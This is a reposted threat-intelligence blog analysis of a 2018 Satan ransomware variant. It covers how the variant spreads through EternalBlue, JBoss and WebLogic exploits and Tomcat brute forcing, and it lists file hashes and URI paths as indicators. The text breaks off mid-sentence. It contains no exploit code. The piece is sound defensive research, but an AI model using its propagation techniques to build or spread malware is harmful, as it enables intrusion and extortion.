One Article Review
| Source |  AlienVault Lab Blog |
|---|---|
| Identifiant | 740343 |
| Date de publication | 2018-06-01 15:00:00 (vue: 2018-07-11 17:03:30) |
| Titre | Satan Ransomware Spawns New Methods to Spread |
| Texte |
Today, we are sharing an example of how previously known malware keeps evolving and adding new techniques to infect more systems.
BleepingComputer first reported on Satan ransomware in January 2017. Recently, Satan Ransomware was identified as using the EternalBlue exploit to spread across compromised environments (BartBlaze’s blog). This is the same exploit associated with a previous WannaCry Ransomware campaign. While Microsoft patched the vulnerability associated with EternalBlue in March 2017, many environments remain vulnerable.
Unusually, we’ve identified samples of Satan Ransomware that not only include EternalBlue,but also a far larger set of propagation methods:
This Satan variant attempts to propagate through:
JBoss CVE-2017-12149
Weblogic CVE-2017-10271
EternalBlue exploit CVE-2017-0143
Tomcat web application brute forcing
Malware Analysis
Below is a sample from early May 2018 of Satan Ransomware using all the previously mentioned techniques, which we are going to analyze.
Name: sts.exe
File size: 1.7 Mb
MD5: c290cd24892905fbcf3cb39929de19a5
The first thing we see in the analyzed sample is that the malware was packed with the MPRESS packer:
The main goal of this sample is to drop Satan Ransomware,encrypt the victim's host, and then request a Bitcoin payment. Afterwards, the sample will also try to spread in the network using exploits such as EternalBlue.
EternalBlue
The malware drops several EternalBlue files in the victim’s host. These files are a public version of the exploit without any modifications or custom implementations. All are dropped in the folder C:\Users\All Users\ in the infected system:
Sts.exe initiates the process of spreading across the network by scanning all the systems within the same network segment. Through the following command line, systems vulnerable to SMB EternalBlue exploit will execute the previously dropped library down64.dll.
The down64.dll attempts to load code in the target’s memory, and then downloads sts.exe, using the legitimate Microsoft certutil.exe tool. This is a known download technique described as Remote File Copy - T1105 in Mitre ATT&CK.
So Many Exploits....
The sample uses some other network activity to continue to spread across the network.
A compromised system will make a HTTP PUT request to /Clist1.jsp to execute a jsp file that downloads another sample of sts.exe in the target server.
Another interesting technique used to infect other systems is the ability to identify an Apache Tomcat server and bruteforce it. It make |
| Notes | |
| Envoyé | Oui |
| Condensat | /clist1 /invoker/readonly /manager/html /orders /wls 119 124 132 5f30aa2fe338191b972705412b8043b0a134cdb287d754771fc225f2309e82ee addresses: b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa b7d8fcc3fb533e5e0069e00bc5a68551479e54a990bb1b658e1bd092c0507d68 cf12eca0e10dc3370d7917e7678dc09629240d3e7cc71c5ac0df68576bea0682 chris collaborations da72b39bb12 doman f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a fernando jsp martinez methods new paths: ransomware satan spawns spread thanks uri wsat/coordinatorporttype xhtml |
| Tags | Ransomware |
| Stories | Wannacry |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.